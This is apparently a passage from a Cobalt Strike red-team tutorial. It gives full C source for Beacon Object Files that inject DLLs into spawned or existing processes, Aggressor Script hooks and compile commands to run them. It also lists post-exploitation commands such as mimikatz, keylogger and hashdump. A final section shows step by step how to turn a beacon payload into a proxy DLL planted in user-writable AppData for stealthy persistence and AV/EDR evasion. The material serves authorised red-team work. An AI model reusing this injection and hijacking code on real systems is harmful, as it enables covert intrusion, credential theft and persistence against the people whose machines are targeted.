   short               ignoreToken;
   char *              dllPtr;
   int                 dllLen;

   /* Warn about crossing to another architecture. */
   if (!is_x64() && x86 == FALSE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x86 -> x64");
   }
   if (is_x64() && x86 == TRUE) {
      BeaconPrintf(CALLBACK_ERROR, "Warning: inject from x64 -> x86");
   }

   /* Extract the arguments */
   BeaconDataParse(&parser, args, alen);
   ignoreToken = BeaconDataShort(&parser);
   dllPtr = BeaconDataExtract(&parser, &dllLen);

   /* zero out these data structures */
   __stosb((void *)&si, 0, sizeof(STARTUPINFO));
   __stosb((void *)&pi, 0, sizeof(PROCESS_INFORMATION));

   /* setup the other values in our startup info structure */
   si.dwFlags = STARTF_USESHOWWINDOW;
   si.wShowWindow = SW_HIDE;
   si.cb = sizeof(STARTUPINFO);

   /* Ready to go: spawn, inject and cleanup */
   if (!BeaconSpawnTemporaryProcess(x86, ignoreToken, &si, &pi)) {
      BeaconPrintf(CALLBACK_ERROR, "Unable to spawn %s temporary process.", x86 ? "x86" : "x64");
      return;
   }
   BeaconInjectTemporaryProcess(&pi, dllPtr, dllLen, 0, NULL, 0);
   BeaconCleanupProcess(&pi);
}

void gox86(char * args, int alen) {
   go(args, alen, TRUE);
}

void gox64(char * args, int alen) {
   go(args, alen, FALSE);
}


  • Line 14 starts the code for the go function. This function is called via the gox86 or gox64 functions, which are defined at lines 53-59.  This function style is an easy way to pass the x86 boolean flag into the go function. 
  • Lines 15-20 define the variables that are referenced in the function. 
  • Lines 22-28 check whether the runtime environment matches the x86 flag; on a mismatch they print a warning message to the Beacon console and continue. 
  • Lines 30-33 extract the two arguments, ignoreToken and dll, from the args parameter. 
  • Lines 35-42 initialize the STARTUPINFO and PROCESS_INFORMATION variables. 
  • Lines 44-50 implement the fork&run technique using Beacon’s internal APIs defined in beacon.h.  This is essentially the same as the built-in technique of spawning a temporary process, injecting the dll into the process and cleaning up. 


Next, compile the source code to generate the .o files using the mingw compiler on Linux. 

x86_64-w64-mingw32-gcc -o inject_spawn.x64.o -c inject_spawn.c 

i686-w64-mingw32-gcc -o inject_spawn.x86.o -c inject_spawn.c 

Create Aggressor Script

File: inject_spawn.cna

# Hook to allow the user to define how the fork and run process injection
# technique is implemented when executing post exploitation commands.
# $1 = Beacon ID
# $2 = memory injectable dll (position-independent code)
# $3 = true/false ignore process token
# $4 = x86/x64 - memory injectable DLL arch
set PROCESS_INJECT_SPAWN {
   local('$barch $handle $data $args $entry');

   # Set the architecture for the beacon's session
   $barch = barch($1);

   # read in the injection BOF based on barch
   warn("read the BOF: inject_spawn. $+ $barch $+ .o");
   $handle = openf(script_resource("inject_spawn. $+ $barch $+ .o"));
   $data = readb($handle, -1);
   closef($handle);

   # pack our arguments needed for the BOF
   $args = bof_pack($1, "sb", $3, $2);

   btask($1, "Process Inject using fork and run.");

   # Set the entry point based on the dll's arch
   $entry = "go $+ $4";
   beacon_inline_execute($1, $data, $entry, $args);

   # Let the caller know the hook was implemented.
   return 1;
}


  • Lines 1-6 are the header information about the function and arguments. 
  • Line 7 starts the function definition for the PROCESS_INJECT_SPAWN function. 
  • Line 8 defines the variables used in the function. 
  • Lines 10-11 set the architecture for the beacon’s session. 
  • Lines 14-17 read the inject_spawn.<arch>.o BOF which matches the beacon’s session architecture.  This is required because the beacon_inline_execute function requires the BOF architecture to match the beacon’s architecture. 
  • Lines 19-20 pack the arguments that the BOF is expecting.  In this example we are passing $3 (ignore process token) as a short and $2 (dll) as binary data. 
  • Line 22 reports the task to Beacon. 
  • Line 25 sets up which function name to call in the BOF, either gox86 or gox64, based on the dll’s architecture.  Note the beacon’s architecture and dll’s architecture do not have to match.  For example, if your Beacon is running in an x86 context on an x64 OS then some post exploitation jobs such as mimikatz will use the x64 version of the mimikatz dll. 
  • Line 26 uses the beacon_inline_execute function to execute the BOF. 
  • Line 29 returns 1 to indicate the PROCESS_INJECT_SPAWN function was implemented. 
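
The distinction between the two architectures is easy to get wrong, so here it is as a small Python model: the BOF file is chosen by the Beacon session's architecture, while the entry point is chosen by the DLL's architecture. The select_bof helper is hypothetical and simply mirrors the string building done in the Aggressor Script above.

```python
from typing import Tuple


def select_bof(beacon_arch: str, dll_arch: str) -> Tuple[str, str]:
    """Return (BOF file name, entry point) for a given pair of architectures."""
    for arch in (beacon_arch, dll_arch):
        if arch not in ("x86", "x64"):
            raise ValueError(f"unsupported architecture: {arch}")
    bof_file = f"inject_spawn.{beacon_arch}.o"  # must match the Beacon session
    entry_point = f"go{dll_arch}"               # follows the DLL being injected
    return bof_file, entry_point


# An x86 Beacon on an x64 OS injecting an x64 DLL.
print(select_bof("x86", "x64"))  # ('inject_spawn.x86.o', 'gox64')
```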

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the inject_spawn.cna Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the screenshot Command

After loading the script, a command like screenshot will use the new hook.

screenshot command using the PROCESS_INJECT_SPAWN hook
Output in the script console when reading the BOF


Example from the Community Kit

Now that we have gone through the simple example to get some understanding of how the PROCESS_INJECT_SPAWN hook works, let’s try something from the Community Kit. The example which will be used is from the BOFs project. For the fork&run implementation, use the example under the StaticSyscallsAPCSpawn folder. This uses the spawn with syscalls shellcode injection (NtMapViewOfSection -> NtQueueApcThread) technique.


  1. Clone or download the source for the BOF project. 
  2. Change directory into the StaticSyscallsAPCSpawn directory 
  3. Review the code within the directory to understand what is being done. 
  4. Compile the object file with the following command. (Optionally use make) 
x86_64-w64-mingw32-gcc -o syscallsapcspawn.x64.o -c entry.c -masm=intel 

When using projects from the Community Kit it is good practice to review the code and recompile the source even if object or binary files are provided.

Items to note in the entry.c file that are different from the simple example:

  1. For this BOF notice that the entry point is ‘go’, which is different than ‘gox86’ or ‘gox64’. 
  2. The argument that this BOF expects is the dll.  The ignoreToken is not used. 
  3. Calls a function named SpawnProcess, which will use the Beacon API function BeaconSpawnTemporaryProcess.  In this case the x86 parameter is hard coded to FALSE and the ignoreToken is hard coded to TRUE. 
  4. Calls a function named InjectShellcode, which implements their injection technique instead of using the function BeaconInjectTemporaryProcess. 
  5. Finally call the Beacon API function BeaconCleanupProcess. 

Now that we understand the differences between the simple example and this project’s code, we can modify the PROCESS_INJECT_SPAWN function from the simple example to work with this project.  Here is the modified PROCESS_INJECT_SPAWN function, which can be put into a new file or added to the existing static_syscalls_apc_spawn.cna file. 

File: static_syscalls_apc_spawn.cna 

    # Hook to allow the user to define how the fork and run process injection
    # technique is implemented when executing post exploitation commands.
    # $1 = Beacon ID
    # $2 = memory injectable dll (position-independent code)
    # $3 = true/false ignore process token
    # $4 = x86/x64 - memory injectable DLL arch
    set PROCESS_INJECT_SPAWN {

        local('$barch $handle $data $args');

        # figure out the arch of this session
        $barch  = barch($1);

        if ($barch eq "x86") {
            warn("Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500) does not support x86. Use built in default");
            return $null;
        }

        # read in the right BOF
        warn("read the BOF: syscallsapcspawn. $+ $barch $+ .o");
        $handle = openf(script_resource("syscallsapcspawn. $+ $barch $+ .o"));
        $data = readb($handle, -1);
        closef($handle);

        # pack our arguments needed for the BOF
        $args = bof_pack($1, "b", $2);

        btask($1, "Syscalls Spawn and Shellcode APC Injection BOF (@ajpc500)");

        beacon_inline_execute($1, $data, "go", $args);

        # Let the caller know the hook was implemented.
        return 1;
    }


  • Lines 1-6 are the header information about the function and arguments. 
  • Line 7 starts the function definition for the PROCESS_INJECT_SPAWN function. 
  • Line 9 defines the variables used in the function. In this example we do not need the $entry variable as the entry point will just be “go”. 
  • Line 12 sets $barch to the beacon’s architecture. 
  • Lines 14-17 are added in this example because this project only supports x64 architecture injection.  When an x86 architecture is detected, the function returns $null to use the built-in technique. 
  • Lines 19-23 read the syscallsapcspawn.<arch>.o BOF which matches the beacon’s session architecture.  This is required because the beacon_inline_execute function requires the BOF architecture to match the beacon’s architecture. 
  • Lines 25-26 pack the arguments that the BOF is expecting.  In this example we are passing $2 (dll) as binary data.  Recall the ignoreToken flag was hard coded to TRUE. 
  • Line 28 reports the task to Beacon, and line 30 uses the beacon_inline_execute function to execute the BOF.  In this case just call “go”, since there is no need to know whether it is x86 or x64 as the x86 flag is hard coded to FALSE. 
  • Line 33 returns 1 to indicate the PROCESS_INJECT_SPAWN function was implemented. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the keylogger Command

After loading the script, a command like keylogger will use the new hook.

keylogger command using the PROCESS_INJECT_SPAWN hook
Output in the script console when reading the BOF

Explicit Process Injection (Put Down That Fork)

The PROCESS_INJECT_EXPLICIT hook is used to define the explicit process injection technique.  The following Beacon commands, aggressor script functions, and UI interfaces listed in the table below will call the hook and the user can implement their own technique or use the built-in technique. 

Additional information for a few commands: 

  1. The [Process Browser] interface is accessed by [beacon] -> Explore -> Process List.  There is also a multi version of this interface which is accessed by selecting multiple beacon sessions and using the same UI menu.  When in the Process Browser use the buttons to perform additional commands on the selected process. 
  2. The chromedump, dcsync, hashdump, keylogger, logonpasswords, mimikatz, net, portscan, printscreen, pth, screenshot, screenwatch, ssh, and ssh-key commands also have a fork&run version.  Using the explicit version requires the pid and architecture arguments. 
  3. For the net and &bnet command the ‘domain’ command will not use the hook. 
Beacon Command    Aggressor Script function    UI Interface
browserpivot      &bbrowserpivot               [beacon] -> Explore -> Browser Pivot
dcsync            &bdcsync
dllinject         &bdllinject
hashdump          &bhashdump
inject            &binject                     [Process Browser] -> Inject
keylogger         &bkeylogger                  [Process Browser] -> Log Keystrokes
logonpasswords    &blogonpasswords
mimikatz          &bmimikatz
net               &bnet
portscan          &bportscan
psinject          &bpsinject
pth               &bpassthehash
screenshot                                     [Process Browser] -> Screenshot (Yes)
screenwatch                                    [Process Browser] -> Screenshot (No)
shinject          &bshinject
ssh               &bssh
ssh-key           &bssh_key
Commands that support the PROCESS_INJECT_EXPLICIT hook in 4.5


The PROCESS_INJECT_EXPLICIT hook accepts the following arguments: 

  • $1 = Beacon ID 
  • $2 = memory injectable DLL (position-independent code) 
  • $3 = the PID to inject into 
  • $4 = offset to jump to 
  • $5 = x86/x64 – memory injectable DLL arch 


The PROCESS_INJECT_EXPLICIT hook should return one of the following values: 

  • $null or empty string to use the built-in technique. 
  • 1 or any non-empty value to use your own explicit injection technique. 

I Want to Use My Own Explicit Injection Technique.

To implement your own explicit injection technique, you will be required to supply a BOF containing your executable code for x86 and/or x64 architectures and an Aggressor Script file containing the PROCESS_INJECT_EXPLICIT hook function. 

Simple Example 

The following example implements the PROCESS_INJECT_EXPLICIT hook to bypass the built-in default.  First, we will create a BOF with our explicit injection implementation. 

File: inject_explicit.c

#include <windows.h>
#include "beacon.h"

/* Windows API calls */
DECLSPEC_IMPORT BOOL   WINAPI KERNEL32$IsWow64Process(HANDLE hProcess, PBOOL Wow64Process);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
DECLSPEC_IMPORT DWORD  WINAPI KERNEL32$GetLastError(VOID);
DECLSPEC_IMPORT BOOL   WINAPI KERNEL32$CloseHandle(HANDLE hObject);

/* is this an x64 BOF */
BOOL is_x64() {
#if defined _M_X64
   return TRUE;
#elif defined _M_IX86
   return FALSE;
#endif
}

/* is this a 64-bit or 32-bit process? */
BOOL is_wow64(HANDLE process) {
   BOOL bIsWow64 = FALSE;

   if (!KERNEL32$IsWow64Process(process, &bIsWow64)) {
      return FALSE;
   }
   return bIsWow64;
}

/* check if a process is x64 or not */
BOOL is_x64_process(HANDLE process) {
   if (is_x64() || is_wow64(KERNEL32$GetCurrentProcess())) {
      return !is_wow64(process);
   }

   return FALSE;
}

/* See gox86 and gox64 entry points */
void go(char * args, int alen, BOOL x86) {
   HANDLE              hProcess;
   datap               parser;
   int                 pid;
   int                 offset;
   char *              dllPtr;
   int                 dllLen;

   /* Extract the arguments */
   BeaconDataParse(&parser, args, alen);
   pid = BeaconDataInt(&parser);
   offset = BeaconDataInt(&parser);
   dllPtr = BeaconDataExtract(&parser, &dllLen);

   /* Open a handle to the process, for injection. */
   hProcess = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
   if (hProcess == INVALID_HANDLE_VALUE || hProcess == 0) {
      BeaconPrintf(CALLBACK_ERROR, "Unable to open process %d : %d", pid, KERNEL32$GetLastError());
      return;
   }

   /* Check that we can inject the content into the process. */
   if (!is_x64_process(hProcess) && x86 == FALSE ) {
      BeaconPrintf(CALLBACK_ERROR, "%d is an x86 process (can't inject x64 content)", pid);
      return;
   }
   if (is_x64_process(hProcess) && x86 == TRUE) {
      BeaconPrintf(CALLBACK_ERROR, "%d is an x64 process (can't inject x86 content)", pid);
      return;
   }

   /* inject into the process */
   BeaconInjectProcess(hProcess, pid, dllPtr, dllLen, offset, NULL, 0);

   /* Clean up */
   KERNEL32$CloseHandle(hProcess);
}

void gox86(char * args, int alen) {
   go(args, alen, TRUE);
}

void gox64(char * args, int alen) {
   go(args, alen, FALSE);
}


  • Lines 1-2 are the include files, where beacon.h can be downloaded from
  • Lines 4-9 define the prototypes for the Dynamic Function Resolution for a BOF. 
  • Lines 11-18 define a function to determine the compiled architecture type. 
  • Lines 20-37 define functions to determine the architecture of the process to inject into. 
  • Line 40 starts the code for the go function. This function is called via the gox86 or gox64 functions, which are defined at lines 78-84.  This function style is an easy way to pass the x86 boolean flag into the go function. 
  • Lines 41-46 define the variables that are referenced in the function. 
  • Lines 48-52 will extract the three arguments pid, offset and dll from the args parameter. 
  • Lines 55-59 will open the process for the specified pid. 
  • Lines 61-69 will verify if the content can be injected into the process. 
  • Line 72 implements the explicit injection technique using Beacon’s internal APIs defined in beacon.h.  This is the same built-in technique for injecting into a process. 
  • Line 75 closes the handle to the process. 
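
The architecture checks described above (lines 20-37 and 61-69) are easier to reason about as a small truth table. The following Python model is only an illustration and is not part of the BOF. The boolean parameters stand in for the results of the Windows API calls, and the name injection_error is an assumption made for this sketch.

```python
def is_x64_process(bof_is_x64, self_is_wow64, target_is_wow64):
    """Model of the C helper: on a 64-bit OS a process is x64 unless it runs under WOW64."""
    # An x64 BOF, or an x86 BOF running under WOW64, implies a 64-bit OS.
    if bof_is_x64 or self_is_wow64:
        return not target_is_wow64
    # Otherwise the OS is 32-bit, so no process can be x64.
    return False


def injection_error(target_is_x64, payload_is_x86):
    """Return the reason injection is refused, or None when the architectures match."""
    if not target_is_x64 and not payload_is_x86:
        return "x86 process (can't inject x64 content)"
    if target_is_x64 and payload_is_x86:
        return "x64 process (can't inject x86 content)"
    return None
```

In this model the injection only proceeds when the DLL architecture and the target process architecture agree, which is the same outcome the BOF enforces before calling BeaconInjectProcess.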


Next, compile the source code to generate the .o files using the mingw compiler on Linux. 

x86_64-w64-mingw32-gcc -o inject_explicit.x64.o -c inject_explicit.c 

i686-w64-mingw32-gcc -o inject_explicit.x86.o -c inject_explicit.c 

Create Aggressor Script

Next, create the Aggressor Script PROCESS_INJECT_EXPLICIT hook function. 

File: inject_explicit.cna

# Hook to allow the user to define how the explicit injection technique
# is implemented when executing post exploitation commands.
# $1 = Beacon ID
# $2 = memory injectable dll for the post exploitation command
# $3 = the PID to inject into
# $4 = offset to jump to
# $5 = x86/x64 - memory injectable DLL arch
set PROCESS_INJECT_EXPLICIT {
   local('$barch $handle $data $args $entry');

   # Set the architecture for the beacon's session
   $barch = barch($1);

   # read in the injection BOF based on barch
   warn("read the BOF: inject_explicit. $+ $barch $+ .o");
   $handle = openf(script_resource("inject_explicit. $+ $barch $+ .o"));
   $data = readb($handle, -1);
   closef($handle);

   # pack our arguments needed for the BOF
   $args = bof_pack($1, "iib", $3, $4, $2);

   btask($1, "Process Inject using explicit injection into pid $3");

   # Set the entry point based on the dll's arch
   $entry = "go $+ $5";
   beacon_inline_execute($1, $data, $entry, $args);

   # Let the caller know the hook was implemented.
   return 1;
}


  • Lines 1-7 contain the header information about the function and arguments. 
  • Line 8 starts the function definition for the PROCESS_INJECT_EXPLICIT function. 
  • Line 9 defines the variables used in the function. 
  • Line 12 sets the architecture for the Beacon’s session. 
  • Lines 15-18 read the inject_explicit.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because the beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Line 21 packs the arguments that the BOF is expecting.  In this example we are passing $3 (pid) as an integer, $4 (offset) as an integer, and $2 (dll) as binary data. 
  • Line 23 reports the task to Beacon. 
  • Line 26 sets up which function name to call in the BOF, either gox86 or gox64, based on the dll’s architecture.  Note the Beacon’s architecture and dll’s architecture do not have to match. 
  • Line 27 uses the beacon_inline_execute function to execute the BOF. 
  • Line 30 returns 1 to indicate the PROCESS_INJECT_EXPLICIT function was implemented. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the inject_explicit.cna Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the screenshot Command

After loading the script, a command like screenshot will use the new hook.

screenshot command using the PROCESS_INJECT_EXPLICIT hook
Output in the script console when reading the BOF


Example from the Community Kit

Now that we have gone through the simple example to get some understanding of how the PROCESS_INJECT_EXPLICIT hook works, let’s try something from the Community Kit. The example which will be used is from the BOFs project. For the explicit injection implementation we will select a different technique from this repository: the example under the StaticSyscallsInject folder. 


  1. Clone or download the source for the BOF project. 
  2. Change directory into the StaticSyscallsInject directory 
  3. Review the code within the directory to understand what is being done. 
  4. Compile the object file with the following command. (Optionally use make) 
x86_64-w64-mingw32-gcc -o syscallsinject.x64.o -c entry.c -masm=intel 

When using projects from the Community Kit, it is good practice to review the code and recompile the source even if object or binary files are provided.

Items to note in the entry.c file that are different from the simple example: 

  1. For this BOF notice that the entry point is ‘go’, which is different than ‘gox86’ or ‘gox64’. 
  2. The arguments that this BOF expects are the pid and dll.  The offset is not used. 
  3. Calls a function named InjectShellcode, which implements their injection technique instead: 
     • Opens the process 
     • Allocates memory and copies the content to the process 
     • Creates the thread and waits for completion 
     • Cleans up 

Now that we understand the differences between the simple example and this project’s code, we can modify the PROCESS_INJECT_EXPLICIT function from the simple example to work with this project.  Here is the modified PROCESS_INJECT_EXPLICIT function, which can be put into a new file or added to the existing static_syscalls_inject.cna file. 

File: static_syscalls_inject.cna

# Hook to allow the user to define how the explicit injection technique
# is implemented when executing post exploitation commands.
# $1 = Beacon ID
# $2 = memory injectable dll for the post exploitation command
# $3 = the PID to inject into
# $4 = offset to jump to
# $5 = x86/x64 - memory injectable DLL arch
set PROCESS_INJECT_EXPLICIT {
   local('$barch $handle $data $args');

   # Set the architecture for the beacon's session
   $barch = barch($1);

   if ($barch eq "x86") {
      warn("Static Syscalls Shellcode Injection BOF (@ajpc500) does not support x86. Use built in default");
      return $null;
   }

   if ($4 > 0) {
      warn("Static Syscalls Shellcode Injection BOF (@ajpc500) does not support offset argument. Use built in default");
      return $null;
   }

   # read in the injection BOF based on barch
   warn("read the BOF: syscallsinject. $+ $barch $+ .o");
   $handle = openf(script_resource("syscallsinject. $+ $barch $+ .o"));
   $data = readb($handle, -1);
   closef($handle);

   # pack our arguments needed for the BOF
   $args = bof_pack($1, "ib", $3, $2);

   btask($1, "Static Syscalls Shellcode Injection BOF (@ajpc500) into pid $3");

   beacon_inline_execute($1, $data, "go", $args);

   # Let the caller know the hook was implemented.
   return 1;
}


  • Lines 1-7 contain the header information about the function and arguments. 
  • Line 8 starts the function definition for the PROCESS_INJECT_EXPLICIT function. 
  • Line 9 defines the variables used in the function. 
  • Line 12 sets the architecture for the Beacon’s session. 
  • Lines 14-17 are added in this example because this project only supports x64 architecture injection.  When an x86 architecture is detected, the hook returns $null to use the built-in technique. 
  • Lines 19-22 are added in this example because this project does not support the offset to jump to argument.  When a non-zero offset is detected, the hook returns $null to use the built-in technique. 
  • Lines 25-28 read the syscallsinject.<arch>.o BOF which matches the Beacon’s session architecture.  This is required because the beacon_inline_execute function requires the BOF architecture to match the Beacon’s architecture. 
  • Line 31 packs the arguments that the BOF is expecting.  In this example we are passing $3 (pid) as an integer, and $2 (dll) as binary data. 
  • Line 33 reports the task to Beacon. 
  • Line 35 uses the beacon_inline_execute function to execute the BOF. 
  • Line 38 returns 1 to indicate the PROCESS_INJECT_EXPLICIT function was implemented. 

Load the Aggressor Script and Begin Using the Updated Hook

Next, load the Aggressor Script file into the Cobalt Strike client through the Cobalt Strike -> Script Manager interface.  Once the script is loaded you can execute the post exploitation commands defined in the table above and the command will now use this implementation. 

Example Using the keylogger Command

After loading the script, a command like keylogger will use the new hook.

keylogger command using the PROCESS_INJECT_EXPLICIT hook
Output in the script console when reading the BOF


Create a proxy DLL with artifact kit

DLL attacks (hijacking, proxying, etc) are a challenge defenders must face. They can be leveraged in a Red Team engagement to help measure these defenses. Have you used this technique? In this post, I’ll walk through an example of adding a DLL proxy to beacon.dll for use in a DLL Proxy attack.

What is DLL Proxying?

To begin with, this is not a new technique. I’ve seen it used occasionally, but it is not always well understood in practice. Other DLL hijacking attacks tend to be used more often, but Red Teams can benefit by adding this technique to their toolbox.

DLL proxying is an attack that falls in the DLL hijacking category.

Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program.

MITRE ATT&CK defines this as Hijack Execution Flow: DLL Search Order Hijacking.

A common way this is abused is to find a process that loads a “ghost” DLL. This is a DLL that is called by the process, but doesn’t actually exist. The calling process ignores this and continues. An attacker can add their own DLL in place of this ghost DLL. This works great, but can be rare.

What if you could modify an existing DLL without breaking the application that depends on that functionality?

This is DLL proxying. It allows an attacker to hijack the execution flow of a process but keep the original functionality of the application. Let’s walk through the attack flow.

DLL Proxy Attack Flow Diagram

Let’s say some process uses math.dll to perform calculations. Someprocess.exe loads math.dll and makes calls to its exported functions as needed. This is why we use external libraries.

If we want to hijack this process, we could easily replace math.dll with something malicious, but this would break the application. We don’t want that, as it may draw attention to what we are doing. Instead, we copy math.dll to original.dll, replace math.dll with a version that forwards the legitimate calls to the new original.dll, and finally use math.dll to load whatever malicious function we want.

In order to do this we need…

  1. The ability to create and write files
  2. The ability to find a target DLL that is loaded by an application
  3. The ability to extract the exports from a target DLL
  4. The ability to create a DLL that will ‘proxy’ the original exports to a copy of the original DLL

This post uses one technique for DLL proxying to specifically show how to use the artifact kit to create this proxy DLL. There are several projects that explore this concept. A quick search can yield a wealth of resources on the topic. One of particular interest is the DueDLLigence project. It is an interesting approach that uses a framework to easily allow the development of malicious DLLs.

Let’s Start with a Simple DLL Proxy Example

Let’s walk through a simple example to help clear this up.

This example uses code that can be found here.

In this example we assume that hello.dll is the DLL being called by our target process. It will become the target of our proxy attack. This is similar to math.dll in the diagram.

Steps to find, build, and use a proxy DLL

1) Understand the execution flow of a process to understand which DLLs are loaded.

We need to start by understanding which DLLs are loaded by a process. The Sysinternals tool Process Monitor (Procmon) works great here.

Real World Tip

I won’t call out any vendor here. My examples simply use rundll32.exe as my ‘application’. Just consider rundll32.exe some real target (maybe a chat application) that uses hello.dll.

The AppData directory is a great place to find candidates for user level persistence. Unlike C:\Program Files, c:\users\USER\AppData is user controlled. Many applications are installed here. cough, cough, chat clients.

A quick tip on using Process Monitor is to filter out what you don’t need before running. In this case, I only want to see Load Image events from my target process.

Procmon Filter

To simulate an application starting up and making calls to its DLLs, I use:

rundll32.exe hello.dll, hello

to have rundll32 call the hello function.

rundll32 loads hello.dll and calls the hello function

In the Process Monitor output, we see that our application loads hello.dll.


Great, we found a candidate DLL in our target application.

Another option to search for targets is to use the DLL_Imports_BOF. This project allows you to search for target applications during an engagement.

This is a BOF to enumerate DLL files to-be-loaded by a given PE file. Depending on the number of arguments, this will allow an operator to either view a listing of anticipated imported DLL files, or to view the imported functions for an anticipated DLL.

No matter what you use, the goal is to understand what DLLs are in play and what exports those DLLs use.

2) Identify the DLL exports.

DLL exports are the functions that an external process can call to use that functionality. It is a core feature of a DLL.

Look at the exports of hello.dll:

If you are following along, compile hello.dll:

x86_64-w64-mingw32-gcc -m64 -c -Os hello.c -Wall -shared -masm=intel
x86_64-w64-mingw32-dllwrap -m64 --def hello.def hello.o -o hello.dll

There are several ways to get the exported function from a DLL.

I included a simple Python script to extract the exports and format them for use in a .def file.

python3 --target hello.dll output

You can also use something like dumpbin from Visual Studio

dumpbin /exports hello.dll
dumpbin output

The point of this is to get a list of the legitimate exported functions from the target DLL. This will give us what we need to build our proxy.

3) Build the proxy.dll.

In this example, I’m writing a proxy in C to be compiled with MinGW. This shows the process, but it could be very different depending on how you build your DLL. No matter what you do, you will be generating a DLL that forwards functions.

Add the exported functions to proxy.def:

proxy.def updated with the hello.dll functions

A module-definition or DEF file (*.def) is a text file containing one or more module statements that describe various attributes of a DLL. If you are not using the __declspec(dllexport) keyword to export the DLL’s functions, the DLL requires a DEF file.

Let’s break down the export hello=original.hello @1:

This is creating the “hello” export for proxy.dll. Calls made to this function are forwarded to the hello function in original.dll. The @1 is the ordinal. (Ordinals are another way a function may be called. It does not always need to match, but can help if ordinals are used.)
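
When a target DLL has many exports, writing these forwarding lines by hand gets tedious. The following is a minimal Python sketch, not the script that accompanies this post, that turns a list of (name, ordinal) pairs into the EXPORTS section of a .def file. The function name build_proxy_def and the assumption that the legitimate DLL has been renamed to original.dll are illustrative only.

```python
def build_proxy_def(exports, original="original"):
    """Return .def file text that forwards every export to the renamed DLL.

    exports:  iterable of (name, ordinal) pairs taken from the target DLL.
    original: base name (without .dll) of the renamed legitimate DLL.
    """
    lines = ["EXPORTS"]
    # Emit entries in ordinal order so the output is stable and easy to diff.
    for name, ordinal in sorted(exports, key=lambda entry: entry[1]):
        lines.append(f"    {name}={original}.{name} @{ordinal}")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(build_proxy_def([("hello", 1)]), end="")
```

For the single export used in this example, the generated entry is the same hello=original.hello @1 line discussed above.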


proxy.c is a very basic DLL. It runs the payload function, and if the target process calls one of the original functions, the call is proxied based on the exports set in proxy.def. The payload function is blocking. This is just a simple example. You should create a thread or use some other non-blocking method.

We are ready to compile proxy.dll

x86_64-w64-mingw32-gcc -m64 -c -Os  proxy.c -Wall -shared -masm=intel
x86_64-w64-mingw32-dllwrap -m64 --def proxy.def proxy.o -o proxy.dll

4) Move the files to the target.

To simulate a real attack you must:

  • rename the original DLL (hello.dll) to original.dll, or to whatever name you set in the proxy.def file.
  • rename proxy.dll to the original file name (hello.dll)

Output after moving and naming the files on the target system.

Directory of Y:\temp\proxydll

10/28/2021  01:53 PM    <DIR>          .
10/28/2021  01:37 PM    <DIR>          ..
10/28/2021  01:37 PM           280,185 hello.dll    <- This was proxy.dll
10/28/2021  01:23 PM           280,167 original.dll <- This was hello.dll

5) Test the proxy.

Let’s use rundll32.exe to simulate an application following its normal routine of loading hello.dll and calling the hello function.

The following command acts more or less the same as an application starting, loading a DLL, and calling a function from that DLL.

rundll32 hello.dll, hello
The payload function from the proxy DLL
The hello function from the original DLL

We called the proxy DLL (hello.dll) using rundll32 as an example target for a DLL loading attack. It executed our payload function and the original function.

That’s it. There really isn’t much to this attack, but it can be very effective. A proxy DLL is just a DLL that proxies legitimate calls and runs your own payload. Proxy attacks allow an attacker to hijack execution flow but keep the original functionality of the application.

Let’s extend this to the Cobalt Strike Artifact Kit

Licensed users of Cobalt Strike have access to the artifact kit. This kit provides a way to modify several aspects of the .exe or .dll beacon payloads. Think of this as a beacon ‘loader’. The kit can be loaded by Cobalt Strike as an aggressor script to update how .exe or .dll payloads are built.

Now that we know the primitives from our example, we can easily update the kit with the changes needed to convert beacon.dll into a proxy.

Modify the file src-main/dllmain.def by adding hello=original.hello @1 as an export option. This is the same as what was done in the example.

Build the kit using the script. By default, this will compile all kit techniques. Let it build them all. We will pick one to load.

Load the artifact kit aggressor script to tell Cobalt Strike to use the newly created template when building a payload. In this case we will use the ‘pipe’ technique. The aggressor script can be found in dist-pipe/artifact.cna after the build is complete.

Cobalt Strike -> Script Manager
Load -> dist-pipe/artifact.cna

Generate a Beacon DLL payload

Attacks -> Packages -> Windows Executable (S)

Listener: Choose Your listener
Output:   Windows DLL
x64:      X

Click Generate and save as hello.dll.

Remember, this is the proxy DLL. It will replace the target DLL, and the target DLL will be renamed to original.dll.

Modified version of artifact.cna to output messages to the script console when the artifact kit is used

Let’s take a look at this beacon DLL payload (hello.dll):

dumpbin /exports hello.dll
exports of hello.dll (proxy)

We see the DLL has the default exports for beacon.dll and the new forwarding export.

Let’s test as we did before by using rundll32 as the target process that we want to attack.

rundll32 hello.dll, hello
Received a new beacon

hello.dll runs the beacon payload, and the hello function call was successfully proxied.

At this point, we have turned beacon.dll into a proxy.

What Next?

This example only shows how to make beacon a DLL proxy. The artifact kit is a way to customize beacon.exe or beacon.dll. It can be used to help bypass AV/EDR. Consider exploring the possibilities of using the kit. Or, forget the artifact kit altogether and write your own beacon loader as a proxy DLL.

Using rundll32 isn’t exciting, but the attack technique itself is a great method for persistence. Many applications are installed in


This directory is writable by the user (vs something like c:\program files). This means an attacker with control over a target can find a target process and create a proxy DLL for that target. Take a look at the applications installed in AppData; you may find a nice target.

Defensive Considerations

